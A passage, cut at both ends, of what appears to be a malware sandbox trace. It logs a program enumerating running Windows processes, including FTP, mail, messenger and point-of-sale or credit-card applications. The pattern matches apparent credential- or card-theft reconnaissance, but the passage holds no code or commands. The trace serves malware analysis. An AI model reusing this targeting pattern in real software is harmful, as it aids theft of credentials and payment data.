th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0231.191] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0231.193] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0231.194] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0231.196] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0231.197] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0231.202] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0231.203] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0231.204] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.205] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.207] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0231.208] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.209] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.211] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.212] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.261] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.265] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.267] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.268] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0231.269] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0231.271] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0231.272] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.274] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.275] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0231.279] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0231.280] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0231.282] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0231.283] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.285] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0231.286] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0231.288] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0231.290] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0231.295] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0231.297] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0231.299] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0231.300] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0231.302] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0231.304] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0231.305] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0231.306] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0231.346] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0231.348] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0231.349] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0231.350] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0231.352] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0231.353] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0231.357] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0231.359] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0231.360] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0231.362] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0231.363] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0231.365] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0231.366] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0231.367] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0231.369] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0231.371] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0231.375] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0231.376] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0231.378] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0231.380] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0231.382] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0231.383] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0231.404] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0231.406] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0231.407] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0231.409] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0231.411] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0231.412] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0231.414] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0231.416] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0231.420] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0231.422] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0231.424] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0231.425] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0231.427] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0231.428] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0231.430] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0231.432] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0231.437] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0231.438] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0231.440] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0231.441] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0231.443] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0231.444] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0231.446] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, 